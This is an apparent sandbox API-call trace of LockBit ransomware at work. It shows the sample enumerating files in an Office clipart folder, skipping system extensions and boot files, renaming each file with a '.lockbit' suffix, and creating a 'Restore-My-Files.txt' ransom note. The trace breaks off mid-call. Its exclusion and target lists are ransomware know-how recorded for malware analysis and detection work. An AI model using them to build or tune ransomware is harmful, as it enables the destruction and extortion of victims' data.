lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0161.559] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0161.559] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0161.560] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0161.573] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="JAVA_01.MID") returned 1 [0161.573] lstrcmpiW (lpString1="ntldr", lpString2="JAVA_01.MID") returned 1 [0161.573] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="JAVA_01.MID") returned 1 [0161.573] lstrcmpiW (lpString1="bootsect.bak", lpString2="JAVA_01.MID") returned -1 [0161.573] lstrcmpiW (lpString1="autorun.inf", lpString2="JAVA_01.MID") returned -1 [0161.573] lstrcmpiW (lpString1="thumbs.db", lpString2="JAVA_01.MID") returned 1 [0161.573] lstrcmpiW (lpString1="iconcache.db", lpString2="JAVA_01.MID") returned -1 [0161.573] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.573] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned=".MID" [0161.573] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0161.573] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0161.573] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0161.573] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0161.574] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0161.574] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0161.574] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0161.574] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0161.574] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0161.574] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.lockbit") returned 71 [0161.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.576] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.576] malloc (_Size=0x40068) returned 0x3df0008 [0161.576] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9797) returned 1 [0161.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.578] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.583] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.583] malloc (_Size=0xa4) returned 0x1fa2ed8 [0161.583] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0xc0000008 [0161.584] free (_Block=0x1fa2ed8) [0161.584] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.584] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.584] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.584] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x16d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNGLE_01.MID", cAlternateFileName="")) returned 1 [0161.584] lstrcmpiW (lpString1=".", lpString2="JNGLE_01.MID") returned -1 [0161.584] lstrcmpiW (lpString1="..", lpString2="JNGLE_01.MID") returned -1 [0161.584] PathFindExtensionW (pszPath="JNGLE_01.MID") returned=".MID" [0161.584] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0161.584] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0161.584] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0161.584] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0161.584] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0161.584] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0161.585] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0161.585] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0161.586] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0161.586] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="JNGLE_01.MID") returned 1 [0161.586] lstrcmpiW (lpString1="ntldr", lpString2="JNGLE_01.MID") returned 1 [0161.586] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="JNGLE_01.MID") returned 1 [0161.586] lstrcmpiW (lpString1="bootsect.bak", lpString2="JNGLE_01.MID") returned -1 [0161.586] lstrcmpiW (lpString1="autorun.inf", lpString2="JNGLE_01.MID") returned -1 [0161.586] lstrcmpiW (lpString1="thumbs.db", lpString2="JNGLE_01.MID") returned 1 [0161.586] lstrcmpiW (lpString1="iconcache.db", lpString2="JNGLE_01.MID") returned -1 [0161.586] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.586] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned=".MID" [0161.586] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0161.587] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0161.587] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0161.588] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.lockbit") returned 72 [0161.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.589] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.589] malloc (_Size=0x40068) returned 0x3df0008 [0161.589] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5843) returned 1 [0161.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.590] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.612] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.612] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.614] free (_Block=0x1fa2ed8) [0161.614] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.614] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.614] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.614] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x968b8700, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x58b00bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x968b8700, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x15f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MP00021_.WMF", cAlternateFileName="")) returned 1 [0161.614] lstrcmpiW (lpString1=".", lpString2="MP00021_.WMF") returned -1 [0161.614] lstrcmpiW (lpString1="..", lpString2="MP00021_.WMF") returned -1 [0161.614] PathFindExtensionW (pszPath="MP00021_.WMF") returned=".WMF" [0161.614] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.614] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.615] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.615] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="MP00021_.WMF") returned 1 [0161.616] lstrcmpiW (lpString1="ntldr", lpString2="MP00021_.WMF") returned 1 [0161.616] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="MP00021_.WMF") returned 1 [0161.616] lstrcmpiW (lpString1="bootsect.bak", lpString2="MP00021_.WMF") returned -1 [0161.616] lstrcmpiW (lpString1="autorun.inf", lpString2="MP00021_.WMF") returned -1 [0161.616] lstrcmpiW (lpString1="thumbs.db", lpString2="MP00021_.WMF") returned 1 [0161.616] lstrcmpiW (lpString1="iconcache.db", lpString2="MP00021_.WMF") returned -1 [0161.616] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.616] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF") returned=".WMF" [0161.616] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.616] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.617] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.617] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.618] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.618] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF.lockbit") returned 72 [0161.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00021_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0161.622] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.622] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.622] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5622) returned 1 [0161.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.624] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.624] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.625] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.627] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.627] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.627] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.629] free (_Block=0x1fa2ed8) [0161.629] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.629] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.629] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 